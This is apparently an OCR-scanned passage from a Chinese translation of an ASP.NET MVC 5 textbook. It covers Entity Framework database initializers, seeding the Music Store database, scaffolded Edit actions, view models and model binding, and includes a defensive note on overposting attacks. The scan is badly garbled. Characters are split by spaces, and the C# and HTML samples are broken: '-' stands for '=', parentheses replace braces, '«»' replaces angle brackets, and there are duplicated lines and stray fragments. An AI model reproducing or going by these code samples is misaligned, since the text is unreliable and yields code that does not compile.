通过 该 表 来 判断 模型 是 否 发 生 改变 ， 导 致 不 再 与 数据 库 模式 匹配 ， 但 是 并 不 能 帮助 我 们 解决 
问题 。 

MigrationHistory 则 更 进一步 ， 为 每 次 迁移 存储 代码 优先 模型 的 一 个 压缩 版 本 ， 从 而 允 
许 按照 需要 在 各 个 版 本 之 间 迁 移 数据 库 。 

如 果 修 改 了 模型 (比如 添加 了 属性 、 删 除了 属性 或 者 添加 了 类 )，EF 可 以 使 用 
”MigrationHistory 表 中 存储 的 信息 来 判断 什么 地 方 发 生 了 变化 ， 然 后 或 者 基于 新 模型 重新 创 
建 数据 库 ， 或 者 抛 出 异常 。 不 必 担 心 一 EF 不 会 在 未 经 我 们 允许 的 情况 下 重新 创建 数据 库 ; 
我 们 需要 提供 一 个 数据 库 初始 化 器 ， 或 者 提供 一 次 迁移 。 

EF 并 不 是 严格 要 求 数据 库 中 有 一 个 MigrationHistory 表 。 这 个 表 只 是 被 EF 用 于 检测 模型 
类 中 的 变化 。 如 果 确 实 愿 意 ， 完 全 可 以 从 数据 库 中 删除 _MigrationHistory 表 ， 实 体 框架 会 假 
定 我 们 知道 自己 在 做 什么 。 删 除 _MigrationHistory 表 以 后 ， 我 们 (或 者 我 们 的 DBA) 将 要 负责 
数据 库 中 的 模式 修改 ， 使 之 匹配 模型 中 的 变化 。 也 可 以 通过 修改 模型 和 数据 库 之 间 的 映射 来 
使 其 可 以 继续 工作 。 以 下 网 址 可 作为 学 习 映 射 和 注解 的 起 点 : http://msdn.microsoft.com/ 
library/gg696169(VS.103).aspx。 


2. 使 用 数据 库 初始 化 器 


保持 数据 库 和 模型 变化 同步 的 一 个 简单 方法 是 允许 实体 框架 重新 创建 一 个 现 有 的 数据 
库 。 可 以 告知 EF 在 应 用 程序 每 次 启动 时 重新 创建 数据 库 或 者 仅 当 检测 到 模型 变化 时 重建 数据 
库 。 当 调用 EF 的 Database 类 (在 名 称 空间 System.Data.Entity 中 ) 中 的 静态 方法 SetInitializer 时 ， 
可 以 选择 这 两 种 策略 中 的 任意 一 个 。 

当 使 用 SetInitializer 方 法 时 ， 需 要 向 其 传递 一 个 IDatabaseInitializer 对 象 ， 而 框架 中 带 有 两 个 
JDatabaseInitializer 对 象 : DropCreateDatabaseAlways 和 DropCreateDatabaseIfModelChanges。 可 以 
根据 这 两 个 类 的 名 称 来 辨别 每 个 类 所 代表 的 策略 。 两 个 初始 化 器 都 需要 一 个 泛 型 类 型 的 参数 ， 
并 且 这 个 参数 必须 是 DbContext 的 派生 类 。 

例如 ， 假 设想 要 在 应 用 程序 每 次 重新 启动 时 都 重新 创建 音乐 商店 的 数据 库 。 那 么 在 文件 
global.asax.cs 内 部 ， 可 在 应 用 程序 启动 过 程 中 设置 一 个 初始 化 器 ; 

protected void Application Start() ( 


Database.SetInitializer( 
new DropCreateDatabaseAlways«MusicStoreDB»()); 


AreaRegistration.RegisterAllAreas(); 
FilterConfig.RegisterGlobalFilters (GlobalFilters.Filters); 
RouteConfig.RegisterRoutes (RouteTable.Routes); 
BundleConfig.RegisterBundles (BundleTable.Bundles); 

} 


现在 可 能 极 想 知道 为 什么 有 人 想 在 每 次 应 用 程序 重新 启动 时 都 要 重新 创建 数据 库 ， 尽 管 
模型 改变 了 ， 但 是 难道 不 想 保留 其 中 的 数据 吗 ? 

这 些 都 是 很 合理 的 问题 。 必 须 记 住 ， 代 码 优先 方法 (如 数据 库 的 初始 化 器 ) 的 特征 是 为 应 
用 程序 生命 周期 早期 阶段 的 欠 代 和 快速 变化 提供 便利 的 。 在 发 布 一 个 实际 网 站 并 且 采 用 真实 
的 客户 数据 之 前 ， 需 要 使 用 迁移 ， 让 EF 的 代码 优先 模型 与 它们 的 数据 库 保持 同步 。 迁 移 允 许 
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在 构建 和 优化 模型 定义 时 ， 保 留 数据 库 中 的 现 有 数据 。 
在 项 目的 最 初 阶段 ， 我 们 创建 的 数据 库 可 能 需要 填充 一 些 初始 记录 ， 像 查找 值 。 我 们 可 
以 通过 下 节 介 绍 的 播种 数据 库 (seeding the database) 来 实现 。 


3. 播种 数据 库 


对 于 MVC Music Store 的 开发 , 现在 假设 将 项 目 设 置 为 在 每 次 应 用 程序 重启 时 重新 创建 数 
据 库 。 然 而 ， 想 让 新 创建 的 数据 库 中 带 有 一 些 流派 、 艺 术 家 甚至 一 些 专辑 ， 以 便 在 开发 应 用 
程序 时 不 必 输 入 数据 就 可 以 使 其 进入 可 用 状态 。 

在 这 样 的 情形 下 , 可 以 创建 一 个 DropCreateDatabaseAlways 类 的 派生 类 并 重 写 其 中 的 Seed 
方法 。Seed 方 法 可 以 为 应 用 程序 创建 一 些 初始 的 数据 。 

为 了 查看 其 实际 运用 ， 在 Models 文 件 夹 中 创建 一 个 新 的 MusicStoreDbInitializer 类 ， 插 入 
程序 清单 4-7 中 显示 的 Seed 方 法 。 


程序 清单 4-7 MusicStoreDblnitializer 


public class MusicstoreDbInitializer 
: System.Data.Entity.DropCreateDatabaseAlways<MusicstoreDB> 
{ 
protected override void Seed(MusicStoreDB context) 
{ 
context.Artists.Add(new Artist (Name = "Al Di Meola")); 
context.Genres.Add(new Genre ( Name = "Jazz" ]); 
context.Albums.Add(new Album 
t 
Artist = new Artist ( Name-"Rush" }, 


Genre = new Genre ( Name-"Rock" ], 
Price - 9.99m, 
Title - "Caravan" 


); 
base.Seed(context); 


) 
调用 重 写 的 基 类 的 Seed 方 法 会 将 新 对 象 保存 到 数据 库 中 。 这 样 ， 每 次 重新 生成 音乐 商店 
数据 库 时 ， 都 会 有 两 种 流派 (Jazz 和 Rock)、 两 个 艺术 家 (Al Di Meola 和 Rush) 和 一 个 专辑 。 想 让 


新 的 数据 库 初始 化 器 起 作用 ， 就 需要 在 应 用 程序 启动 代码 部 分 注册 这 个 初始 化 器 ， 如 程序 清 
单 4-8 所 示 : 
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程序 清单 4-8 Global.asax.cs 


protected void Application Start() ( 
Database.SetInitializer(new MusicStoreDbInitializer()); 


AreaRegistration.RegisterAllAreas(); 
FilterConfig.RegisterGlobalFilters (GlobalFilters.Filters); 
RouteConfig.RegisterRoutes (RouteTable.Routes); 
BundleConfig.RegisterBundles (BundleTable.Bundles); 


4m 模 m 


如 果 现 在 重启 并 运行 应 用 程序 ， 在 浏览 器 中 导航 到 /StoreManager URL， 将 看 到 商店 管理 
器 中 Index 视 图 的 运行 效果 ， 如 果 4-10 所 示 。 


€ e EE (ET 
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图 4-10 


图 4-10 所 示 就 是 一 个 带 有 真正 功能 和 真实 数据 的 程序 的 运行 效果 ! 

虽然 它 看 起 来 似乎 有 很 多 的 工作 ， 到 目前 为 止 在 理解 生成 代码 和 实体 框架 上 占用 了 大 部 
分 章节 篇 幅 ， 但 是 一 旦 知道 了 基 架 能 够 做 的 工作 ， 那 么 实际 的 工作 量 是 非常 小 的 ， 仅 需要 
za 

(1) 实现 模型 类 。 

Q) 为 控制 器 和 视图 构建 基 架 。 

(3) 选择 数据 库 初 始 化 策略 。 


初始 化 器 种 子 与 迁移 种 子 


迁移 也 支持 播种 方法 ， 所 以 从 快捷 的 数据 库 初 始 化 器 方法 改 为 使 用 更 加 复杂 的 迁移 方法 


时 ， 就 需要 修改 必要 的 播种 方法 ， 使 其 适用 于 迁移 。 

初始 化 器 种 子 与 迁移 种 子 之 间 存 在 一 个 重要 的 区 别 。 因 为 数据 库 初始 化 器 种 子 方法 是 针 
对 空 数据 库 运行 的 ， 所 以 不 需要 担心 插入 重复 数据 。 而 迁移 种 子 方法 会 在 每 次 更 新 数据 库 时 
运行 ， 所 以 必须 小 心 ， 以 免 在 同一 个 数据 库 上 多 次 运行 种 子 方法 时 添加 重复 数据 。EF 4.3 及 
更 高 版 本 中 添加 了 DbSet.AddOrUpdate() 扩 展 方法 来 简化 这 项 任务 。 


要 记 住 ， 基 架 只 是 为 应 用 程序 的 特定 部 分 提供 了 一 个 起 点 ， 在 此 基础 上 可 以 自由 地 调整 
和 修改 生成 的 代码 。 例 如 ， 我 们 可 能 喜欢 (或 不 喜欢 ) 每 个 专辑 行 右 边 的 链接 (Edit、Details、 
Delete)， 如 果 不 喜欢 这 些 链接 的 话 ， 就 可 以 将 其 从 视图 中 自由 地 删除 。 然 而 ， 本 章 接 下 来 要 
做 的 就 是 在 编辑 场景 下 ， 看 看 ASPNET MVC 是 如 何 更 新 视图 模型 的 。 


4.3 编辑 专辑 


基 架 将 要 处 理 的 情形 之 一 就 是 编辑 专辑 。 该 情形 是 从 用 户 通过 单 击 mdex 视 图 中 的 Edit 链 
接 ( 见 图 4-10) 开 始 的 。 编 辑 链接 向 Web 服 务 器 发 送 一 个 带 有 URL 的 HITP GET 请 求 ， 如 URI 为 
/StoreManager/EdiV5， 其 中 5 表示 特定 专辑 的 ID 属性 值 。 可 以 将 发 送 的 这 个 请 求 看 成 “给 我 一 
些 编辑 专辑 茸 的 项 ”。 
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4.3.1 


创建 编辑 专辑 的 资源 


默认 的 MVC 路 由 规则 是 将 HTTP GET 请 求 中 的 /StoreManager/Edit/5 传 递 到 StoreManager 控 


制 器 的 Edit 操 作 中 ， 代 码 如 下 所 示 ( 并 不 需要 键入 这 些 代 码 ， 它 们 是 在 为 StoreManager 控 制 器 
构建 基 架 时 生成 的 ): 


) 


// GET: /StoreManager/Edit/5 
public ActionResult Edit(int? id) 
{ 


if (id == null) 
{ 
return new HttpStatusCodeResult (HttpStatusCode.BadRequest); 
) 
Album album - db.Albums.Find(id); 
if (album == null) 
{ 
return HttpNotFound(); 
) 
ViewBag.ArtistId - 
new SelectList(db.Artists, "ArtistId", "Name", album.ArtistId); 
ViewBag.GenreId - 
new SelectList(db.Genres, "GenreId", "Name", album.GenreId); 
return View (album); 


Edit 操 作 负 责 构建 一 个 编辑 专辑 和 的 模型 。 它 使 用 MusicStoreDB 类 来 检索 专辑 ， 并 将 专 


辑 作为 模型 传递 给 视图 。 但 是 将 数据 放 进 ViewBag 的 两 行 代码 的 作用 是 什么 呢 ? 当 看 到 用 户 
的 专辑 编辑 页 面 时 ， 就 会 知道 这 两 行 代码 到 底 起 了 多 大 的 作用 ! 专辑 编辑 界面 如 图 4-11 所 示 。 
因为 数据 库 中 只 有 一 个 专辑 ， 所 以 需要 浏览 到 /StoreManager/Edit/1。 
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图 4-11 


第 4 章 模 m 


当 用 户 编辑 专辑 时 ， 对 于 专辑 的 流派 和 艺术 家 属性 的 值 来 说 ， 不 希望 输入 自由 格式 的 文 
本 。 反 而 想 让 用 户 从 数据 库 中 已 经 存在 的 流派 和 艺术 家 中 选择 一 个 。 基 架 远 见 卓 识 地 意识 到 
了 这 一 点 ， 因 为 基 架 理解 专辑 、 艺 术 家 和 流派 三 者 之 间 的 关联 关系 。 

基 架 生成 的 编辑 视图 不 是 提供 给 用 户 文本 框 来 输入 流派 名 称 ， 而 是 让 用 户 在 下 拉 框 列表 
中 选择 现 有 的 流派 ， 如 图 4-12 所 示 。 


Rock 
Artistid 

Rush vi 
Te 

[Caravan 


Price. 
9.99 


AlbumArturi 


Save 
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图 4-12 


下 面 是 商店 管理 器 的 Edit 视 图 中 用 来 为 流派 创建 下 拉 列 表 的 代码 (图 4-12 所 示 为 下 拉 列 表 
中 有 两 个 可 用 的 流派 ): 
«div class-"col-md-10"» 
GHtml.DropDownList ("GenreId", String.Empty) 
G(GHtml.ValidationMessageFor (model => model.GenreId) 
«/div» 
在 下 一 章 可 以 详细 地 看 一 下 DropDownList 辅 助 方法 ， 但 是 现在 ， 自 己 只 能 从 零 开 始 创 建 
下 拉 列 表 。 要 创建 这 个 列表 ， 需 要 知道 所 有 可 得 到 的 列表 项 有 哪些 。 然 而 Album 模 型 对 象 不 
会 保存 数据 库 中 所 有 可 得 到 的 流派 一 -Album 对 象 仅 保存 与 它 本 身 相 关 的 流派 。Edit 操 作 中 多 
出 来 的 两 行 代码 就 是 为 了 构建 从 数据 库 中 所 有 可 得 到 的 流派 和 艺术 家 的 列表 ， 并 将 这 些 列表 
存储 在 ViewBag 中 以 便 以 后 让 DropDownList 辅 助 方法 检索 。 


ViewBag.ArtistId = 
new SelectList(db.Artists, "ArtistId", "Name", album.ArtistId); 


ViewBag.GenreId - 
new SelectList(db.Genres, "GenreId", "Name", album.GenreId); 


代码 中 使 用 的 SelectList 类 用 于 表示 构建 下 拉 列 表 需 要 的 数据 。 其 中 构造 函数 的 第 1 个 参 
数 指定 了 将 要 放 在 列表 中 的 项 , 第 2 个 参数 是 一 个 属性 名 称 , 该 属性 包含 当 用 户 选择 一 个 指定 
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项 时 使 用 的 值 ( 键 值 ， 像 52 或 2)。 第 3 个 参数 是 每 一 项 要 显示 的 文本 ( 像 “Rock” 或 “Rush”)。 
最 后 ， 第 4 个 参数 包含 了 最 初 选 定 项 的 值 。 


1. 模型 和 视图 模型 终极 版 


还 记得 上 一 章 谈 到 的 视图 特定 模型 的 概念 吗 ? 专辑 编辑 情形 就 是 一 个 很 好 的 例子 ， 这 里 
的 模型 对 象 (Album 对 象 ) 并 没有 包含 编辑 视图 所 需要 的 全 部 信息 , 因为 另外 还 需要 所 有 可 能 饼 
流派 和 艺术 家 列表 。 针 对 这 个 问题 ， 有 两 种 可 能 的 解决 方案 。 

基 架 生成 代码 展示 了 第 一 种 解决 方案 : 将 额外 的 信息 传递 到 ViewBag 结 构 中 。 这 个 方案 
完全 合理 而 且 还 便于 实现 ， 但 是 一 些 人 想 通 过 一 个 强 类 型 的 模型 对 象 得 到 所 有 的 模型 数据 。 

强 类 型 模型 的 拥护 者 可 能 选择 第 二 种 方案 : 创建 一 个 视图 特定 模型 的 对 象 , 将 专辑 信息 、 
流派 和 艺术 家 信息 传递 给 一 个 视图 。 这 个 模型 可 能 要 使 用 下 面 这 个 类 定义 : 

public class AlbumEditViewModel 

i public Album AlbumToEdit { get; set; } 

public SelectList Genres { get; set; } 


public SelectList Artists { get; set; } 
} 


这 样 Edit 操 作 就 不 再 需要 将 信息 放 进 ViewBag， 而 需要 实例 化 AlbumEditViewModel 类 ， 
设置 所 有 的 对 象 属性 ， 并 将 视图 模型 传递 给 视图 。 这 两 种 方法 不 能 说 哪 一 种 好 、 哪 一 种 坏 ， 
而 应 该 根据 自身 特点 选择 一 种 适合 自己 的 方法 。 


2. Edit 视图 
尽管 下 面 没有 原样 地 列 出 Edit 视 图 内 的 代码 ， 但 它 却 代 表 了 Edit 视 图 的 本 质 : 
@using (Html.BeginForm()) ( 


GHtml.DropDownList ("GenreId", String.Empty) 
GHtml.EditorFor(model => model.Title) 
QHtml.EditorFor(model => model.Price) 
«p» 
«input type-"submit" value-"Save" /» 
</p> 
} 


该 视图 中 包含 一 个 表单 ， 其 中 包含 有 让 用 户 输入 信息 的 各 种 input 元 素 。 其 中 一 些 input 元 
素 是 下 拉 列 表 (HTML <select> 元 素 )， 还 有 一 些 是 文本 框 控 件 (HTML<input type='"text"> 元 素 )。 
下 面 展示 了 Edit 视 图 泻 染 的 HIML 的 本 质 : 


«form action-"/storemanager/Edit/8" method="post"> 
«select id-"GenreId" name-"GenreId"» 
<option value-""»«/option» 
«option selected-"selected" value-"1"»5Rock«/option» 
«option value-"2"»Jazz«/option» 
«/select» 
«input class-"text-box single-line" id-"Title" name-"Title" 
type-"text" value-"Caravan" /» 
«input class-"text-box single-line" id-"Price" name-"Price" 
type-"text" value-"9.99" /> 


«p» 
«input type="submit" value-"Save" /> 

</p> 

</form> 


当 用 户 单 击 页 面 上 的 Save 按 钮 时 ，HTML 将 发 送 一 个 HTTP POST 请 求 ， 请 求 回 到 
/StoreManager/Edit/1 页 面 。 这 时 浏览 器 会 自动 收集 用 户 在 表单 中 输入 的 所 有 信息 并 将 这 些 值 
(及 其 相关 的 name 属 性 值 ) 放 在 请 求 中 一 起 发 送 。 这 里 注意 input 和 和 select 元 素 的 name 属 性 ， 这些 
名 称 是 要 匹配 Album 模 型 中 属性 名 称 的 ， 这 就 是 其 名 称 极 短 的 原因 所 在 。 


4.3.2 ”响应 编辑 时 的 POST 请 求 


接受 HTTP POST 请 求 来 编辑 专辑 信息 的 操作 的 名 称 也 是 Edit， 但 不 同 于 前 面 看 到 的 Edit 
操作 ， 因 为 它 有 一 个 HttpPost 操 作 选 择 器 特性 : 


// POST: /StoreManager/Edit/5 

// To protect from overposting attacks, please enable the specific 

// properties you want to bind to, for more details see 

// http://go.microsoft.com/fwlink/?LinkId=317598. 

[HttpPost] 

[ValidateAntiForgeryToken] 

public ActionResult Edit 
( [Bind (Include="AlbumId, GenreId,ArtistId,Title,Price,AlbumArtUrl")] 
Album album) 

{ 


if (ModelState.IsValid) 
{ 
db.Entry (album) .State = EntityState.Modified; 
db.SaveChanges () ; 
return RedirectToAction ("Index"); 
) 
ViewBag.ArtistId = 
new SelectList(db.Artists, "ArtistId", "Name", album.ArtistId); 
ViewBag.GenreId = 
new SelectList(db.Genres, "GenreId", "Name", album.GenreId); 
return View (album); 
)View (album); 
} 


这 个 操作 的 作用 就 是 接收 含有 用 户 所 有 编辑 项 的 Album 模 型 对 象 ， 并 将 这 个 对 象 保存 到 
数据 库 中 。 现 在 可 能 极 想 知道 更 新 后 的 Album 对 象 是 如 何 作为 一 个 参数 出 现在 操作 中 的 ， 这 
个 问题 将 延迟 到 本 章 的 下 一 节 了 予以 解答 。 因 为 现在 的 重点 是 操作 内 部 的 讲解 。 


1. 编辑 happy path 


happy path 就 是 当 模型 处 于 有 效 状态 并 可 以 将 对 象 保存 到 数据 库 时 执行 的 代码 路 径 。 操 作 
通过 ModelState.IsValid 属 性 来 检查 模型 对 象 的 有 效 性 。 在 本 章 后 面 将 详细 探讨 这 个 属性 ， 并 
且 在 第 6 章 可 以 学 习 如 何 向 模型 中 添加 验证 规则 。 这 里 就 把 ModelState IsValid 属 性 看 做 一 个 信 
号 ， 来 确保 用 户 输入 有 用 的 专辑 特性 值 。 

如 果 模 型 处 于 有 效 状 态 ，Edit 操 作 将 执行 下 面 这 一 行 代码 : 
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db.Entry(album).State = EntityState.Modified; 

这 行 代码 是 告知 数据 上 下 文 该 对 象 在 数据 库 中 已 经 存在 (这 不 是 一 个 新 的 专辑 , 而 是 已 经 
存在 的 )， 所 以 框架 应 该 对 现 有 的 专辑 应 用 数据 库 中 的 值 而 不 要 再 创建 一 个 新 的 专辑 记录 。 下 
一 行 代码 将 在 数据 上 下 文中 调用 SaveChanges, 这 时 上 下 文生 成 一 条 SQL UPDATE 命 令 来 更 新 


对 应 的 字段 值 以 保留 新 值 。 
2. 编辑 sad path 


sad path 是 当 模型 无 效 时 操作 采用 的 路 径 。 在 
sad path 中 ， 控 制 器 操作 需要 重新 创建 Edit 视 图 ， 
以 便 用 户 改正 自身 产生 的 错误 。 例 如 ， 用 户 给 专 
辑 价格 输入 值 abc。 字 符 串 abc 不 是 一 个 有 效 的 十 
进 制 数 值 ， 这 样 模型 状态 就 是 无 效 的 。 据 此 ， 操 
作 将 重建 下 拉 控 件 的 列表 并 要 求 Edit 视 图 重新 演 
染 。 对 此 ， 用 户 将 会 看 到 图 4-13 所 示 的 页 面 。 当 
然 ， 我 们 会 在 用 户 错误 到 达 服 务 器 之 前 捕获 这 个 
错误 ， 因 为 ASPNET MVC 默 认 提供 了 客户 端 验 
证 , 这 些 关 于 客户 端 验证 的 内 容 将 在 第 8 章 中 进行 
学 习 。 

现在 可 能 极 想 知道 错误 信息 是 如 何 出 现 的 ， 
这 同样 与 模型 验证 有 关 。 模 型 验证 将 在 第 6 章 深入 
讲解 。 现 在 先 理解 这 个 Edit 操 作 如 何 接收 一 个 包 
含 所 有 用 户 新 数据 值 的 Album 对 象 。 该 过 程 的 幕 
后 推手 就 是 模型 绑 定 , 它 是 ASPNET MVC 的 一 个 
核心 特性 。 


44 模型 绑 定 
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日 2013- My ASP.NET Application 


图 4-13 


想象 自己 要 实现 HITP POST 的 Edit 操 作 ， 并 且 还 不 知道 能 够 简化 编程 的 任何 ASPNET 
MVC 特 性 。 因 为 作为 一 名 专业 的 Web 开 发 人 员 ， 应 该 能 够 意识 到 Edit 视 图 将 会 把 表单 中 的 值 
提交 给 服务 器 。 如 果 为 了 更 新 专辑 而 检索 这 些 值 , 那么 可 能 会 选择 直接 从 请 求 中 提取 这 些 值 : 


[HttpPost] 
public ActionResult Edit() 
{ 

var album = new Album(); 


album.Title = Request.Form["Title"]; 
album.Price = Decimal.Parse(Request.Form["Price"]); 


founa and So On &. 
} 


正如 想象 的 那样 ， 代 码 会 变 得 元 长 乏味 。 上 面 展 示 的 代码 只 是 设置 了 两 个 属性 ， 还 有 4 


个 、5 个 甚至 更 多 的 属性 需要 设置 。 从 Form 集 合 (其 


中 包括 所 有 通过 name 属 性 提交 的 表单 值 ) 
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中 提取 属性 值 并 将 这 些 值 存储 在 Album 属 性 中 ， 而 且 任何 不 是 字符 串 类 型 的 属性 都 需要 进行 
类 型 转换 。 

幸运 的 是 ，Edit 视 图 认真 地 命名 了 每 一 个 表单 输入 来 匹配 Album 属 性 。 如 果 还 记得 前 面 
看 到 的 HTML 的话 ， 就 应 该 知道 Title 值 的 input 元 素 的 名 称 是 Title，Price 值 的 input 元素 的 名 称 
是 Price。 可 以 修改 视图 让 其 使 用 不 同 的 名 称 ( 像 Foo 和 Bar)， 但 是 这 样 做 只 能 使 编写 操作 代码 
更 加 困难 。 如 果真 是 这 样 的 话 ， 就 必须 记 住 Title 的 值 是 一 个 名 为 “Foo” 的 input 元 素 ， 这 太 荒 
BT! 
既然 input 元 素 名 称 匹配 属性 名 称 ， 那 么 为 什么 不 根据 命名 约定 编写 一 段 通用 代码 来 解决 
这 个 问题 呢 ? 这 也 正 是 ASPNET MVC 提 供 的 模型 绑 定 功能 之 所 在 。 


4.4.1 DefaultModelBinder 
Edit 操 作 简单 地 采用 Album 对 象 作为 参数 而 不 是 从 请 求 中 挖 取 表 单 值 ， 如 下 所 示 : 


[HttpPost] 
public ActionResult Edit (Album album) 
{ 

£L wes 


) 


当 操 作 带 有 一 个 参数 时 ，MVC 运 行 环境 就 会 使 用 一 个 模型 绑 定 器 来 构建 这 个 参数 。 在 
MVC 运 行 时 中 ， 可 以 为 不 同类 型 的 模型 注册 多 个 模型 绑 定 器 , 但 是 一 般 情 况 下 默认 的 绑 定 器 
是 DefaultModelBinder。 在 Album 对 象 的 情形 中 ， 默 认 的 模型 绑 定 器 检查 Album 类 ， 并 查找 能 
用 于 绑 定 的 所 有 Album 属 性 。 遵 照 前 面 介绍 的 命名 约定 ， 默 认 的 模型 绑 定 器 能 自动 将 请 求 中 
的 值 转换 和 移入 到 一 个 Album 对 象 中 (模型 绑 定 器 也 可 以 创建 一 个 对 象 实例 来 填充 )。 

换 句 话说 ， 当 模型 绑 定 器 看 到 Album 具 有 Title 属 性 时 ， 它 就 在 请 求 中 查找 名 为 “Title” 
的 参数 。 注 意 这 里 是 说 “在 请 求 中 ”而 不 是 “在 表单 集合 中 ”。 模 型 绑 定 器 使 用 称 为 值 提供 器 
(value provider) 的 组 件 在 请 求 的 不 同 区 域 中 查找 参数 值 。 模型 绑 定 器 可 以 查看 路 由 数据 、 查 询 
字符 串 和 表单 集合 ， 当 然 如 果 愿 意 的 话 也 可 以 添加 自 定义 的 值 提供 器 。 

模型 绑 定 不 局 限于 HTTP POST 操作 和 复合 类 型 参数 ( 像 Album 对 象 )。 模 型 绑 定 也 可 以 将 
原始 参数 传 入 操作 ， 就 像 用 于 Edit 操 作 响应 HTTP GET 请 求 一 样 : 

public ActionResult Edit(int id) 

i FE ek 

i 

这 种 情况 下 ， 模 型 绑 定 器 用 参数 (id 的 名 字 在 请 求 中 查找 值 。 路 由 引擎 在 URL 
/StoreManager/Edit1 中 找到 ID 值 ， 但 不 是 由 路 由 引擎 而 是 模型 绑 定 器 将 其 从 路 由 数据 转换 并 
移入 到 id 参数 中 的 。 也 可 以 使 用 URL /StoreManager/Edit?id=1 来 调用 这 个 操作 ， 因 为 模型 绑 定 
器 可 以 在 查询 字符 串 集 中 找到 id 参数 。 

模型 绑 定 器 有 点 像 搜 救 大 。 运 行 时 告知 模型 绑 定 器 想 要 知道 某 个 id 属性 值 ， 然 后 绑 定 器 
开始 到 处 查找 名 为 id 的 参数 。 


模型 绑 定安 全 性 简介 


有 时 模型 绑 定 器 侵略 性 的 搜索 行为 会 产生 意 想不到 的 后 果 。 上 面 提 到 了 默认 的 模型 绑 定 
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器 如 何 查看 AlIbum 对 象 的 可 用 属性 并 试图 通过 找 遍 请 求 为 每 一 个 属性 找到 一 个 匹配 值 。 但 我 
们 偶尔 会 有 一 两 个 属性 可 能 不 想 (或 期 望 ) 使 用 模型 绑 定 器 来 设置 ， 这 时 就 要 注意 避免 “重复 
提交 ”(overposting) 攻 击 了 。 通 过 一 次 成 功 的 重复 提交 攻击 ， 恶 意 的 攻击 者 可 以 毁坏 我 们 的 
应 用 程序 和 数据 ， 所 以 不 要 轻视 了 这 个 警告 。 

ASPNETMVC 5 现在 包含 一 条 注释 ， 警 告 可 能 发 生 重复 提交 攻击 ， 以 及 Bind 特 性 可 以 限 
制 绑 定 行为 : 


// POST: /StoreManager/Edit/5 

// To protect from overposting attacks, please enable the 

// specific properties you want to bind to, for more details see 

// http://go.microsoft.com/fwlink/?LinkId-317598. 

[HttpPost] 

[ValidateAntiForgeryToken] 

public ActionResult Edit 
([Bind( 

Include-"AlbumId,GenreId,ArtistId,Title,Price,AlbumArtUrl")] 

Album album) 


第 7 章 将 更 加 详细 地 探讨 重复 提交 攻击 ， 同 时 也 介绍 一 些 防御 攻击 的 技术 。 现 在 请 记 住 
这 个 威胁 ， 并 请 在 后 面 务必 阅读 第 7 章 的 内 容 ! 


4.4.2 TAREHE 


当 操 作 中 有 参数 时 ， 模 型 绑 定 会 隐 式 地 工作 。 也 可 以 使 用 控制 器 中 的 UpdateModel 和 
TryUpdateMode] 方 法 显 式 地 调用 模型 绑 定 。 如 果 在 模型 绑 定期 间 出 现 错误 或 者 模型 是 无 效 的 ， 
UpdateModel 方 法 将 抛 出 一 个 异常 。 如 果 使 用 UpdateModel 方 法 而 不 带 操作 参数 ，Edit 操 作 将 
如 下 所 示 : 


[HttpPost] 
public ActionResult Edit() 
{ 
var album = new Album(); 
try 
t 
UpdateModel (album); 
db.Entry(album).State - EntityState.Modified; 
db.SaveChanges () ; 
return RedirectToAction ("Index"); 
i 
catch 
t 
ViewBag.GenreId - new SelectList(db.Genres, "GenreId", 
"Name", album.GenreId); 
ViewBag.ArtistId = new SelectList(db.Artists, "ArtistId", 
"Name", album.ArtistId); 
return View (album); 
} 
} 


TryUpdateModel 方 法 也 可 以 调用 模型 绑 定 ， 但 不 会 抛 出 异常 。TryUpdateModel 会 返回 一 
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个 布尔 类 型 的 值 一 一 true 表 示 模 型 绑 定 成 功 , 模型 是 有 效 的 ; false 表 示 模 型 绑 定 过 程 中 出 现 了 
错误 。 


[HttpPost] 
public ActionResult Edit() 
t 
var album - new Album(); 
if (TryUpdateModel (album)) 
t 
db.Entry(album).State = EntityState.Modified; 
db.SaveChanges () ; 
return RedirectToAction ("Index"); 
) 
else 
t 
ViewBag.GenreId - new SelectList(db.Genres, "GenreId", 
"Name", album.GenreId); 
ViewBag.ArtistId - new SelectList(db.Artists, "ArtistId", 
"Name", album.ArtistId); 
return View (album); 


} 


模型 绑 定 的 副产品 就 是 模型 状态 。 模 型 绑 定 器 移 进 模型 中 的 每 一 个 值 在 模型 状态 中 都 有 
相应 的 一 条 记录 。 模 型 绑 定 后 ， 可 以 随时 查看 模型 状态 以 检查 模型 绑 定 是 否 成 功 : 


[HttpPost] 
public ActionResult Edit() 
t 
var album - new Album(); 
TryUpdateModel (album); 
if (ModelState.IsValid) 
{ 
db.Entry(album).State = EntityState.Modified; 
db.SaveChanges () ; 
return RedirectToAction ("Index"); 
) 
else 
t 
ViewBag.GenreId - new SelectList(db.Genres, "GenreId", 
"Name", album.GenreId); 
ViewBag.ArtistId - new SelectList(db.Artists, "ArtistId", 
"Name", album.ArtistId); 
return View (album); 


} 


限制 模型 绑 定 的 两 个 选项 


如 同 前 面 “ 模 型 绑 定 的 安全 性 简介 ”边栏 中 介绍 的 那样 ， 在 与 绑 定 的 任何 交互 中 ， 重 复 
提交 是 一 个 需要 重点 考虑 的 问题 。 如 前 所 述 ， 除 了 使 用 Bind 特 性 来 限制 隐 式 模型 绑 定 以 外 ， 
在 使 用 UpdateModel 和 TryUpdateModel 时 也 可 以 限制 绑 定 。 这 两 个 方法 都 有 重 载 版 本 , 允许 指 
定 一 个 includeProperties 参 数 。 这 个 参数 包含 一 个 属性 名 称 的 数组 ， 指 出 了 我 们 显 式 允 许 绑 定 
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到 的 属性 ， 如 下 面 的 代码 所 示 : 


UpdateModel(product, new[] { "Title", "Price", "AlbumArtUrl" }); 


任何 额外 的 属性 都 会 被 名 略 。 前 面 解释 过 (第 7 章 将 更 加 详细 地 解释 )， 这 允许 我 们 显 式 地 
指定 想 要 通过 模型 绑 定 设置 的 参数 。 


如 果 在 模型 绑 定 过 程 中 出 现 了 错误 ， 那 么 模型 状态 将 会 包含 导致 绑 定 失败 的 属性 名 、 尝 
试 的 值 以 及 错误 消息 。 虽 然 模型 状态 可 以 用 来 调试 程序 ， 但 它 的 主要 作用 是 为 用 户 显示 错误 
信息 ， 以 告知 为 什么 数据 输入 失败 ， 并 显示 他 们 最 初 输入 的 数据 (而 不 是 显示 默认 值 )。 接 下 
来 的 两 章 将 讲解 模型 状态 如 何 使 HTML 辅助 方法 、MVC 验 证 特性 和 模型 绑 定 一 起 工作 。 
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本 章 侧重 于 讲解 如 何 利用 模型 对 象 来 构建 ASPNET MVC 应 用 程序 。 可 以 使 用 C# 语 言 
写 模型 定义 类 ， 然 后 根据 指定 的 模型 类 型 使 用 基 架 生成 应 用 程序 的 其 他 部 分 。ASPNET MVC 
